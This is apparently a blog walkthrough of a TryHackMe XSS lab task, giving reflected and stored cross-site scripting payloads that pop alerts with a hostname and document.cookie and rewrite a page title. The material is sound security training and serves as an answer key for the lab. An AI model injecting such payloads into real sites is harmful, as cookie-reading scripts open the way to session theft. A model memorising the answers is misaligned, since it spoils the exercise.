OWASP Top 10| Cross-Site Scripting| TryHackMe| Task 20

br4ind3ad
2 min readJul 2, 2021

--

a) Deploy the VM

b)Navigate to http://MachineIP/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
Use <script>alert(Hello)</script> in the navbar to get the flag

c) On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine’s IP address.

window.location.hostname returns the domain name of the web host

Use <script>alert(window.location.hostname)</script> to get the flag

d) Now navigate to http://10.10.3.53/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.

Let’s create an account first.
username: test1
password: password

& Login.

Then go to the stored XSS tab and add a comment i.e. some html code
example:
<!DOCTYPE html>
<html>
<head>
<title>This is the page title</title>
</head>
<body>
<h1>This is a Heading</h1>
<p>This is a paragraph.</p>
</body>
</html>

Under comments you’ll see the flag

e) On the same page, create an alert popup box appear on the page with your document cookies.
use <script>alert(document.cookie)</script>

click on then you’ll get the flag

f) Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

Run —

<script>document.querySelector(‘#thm-title’).textContent = ‘I am a hacker’</script>

to get the flag.

--

--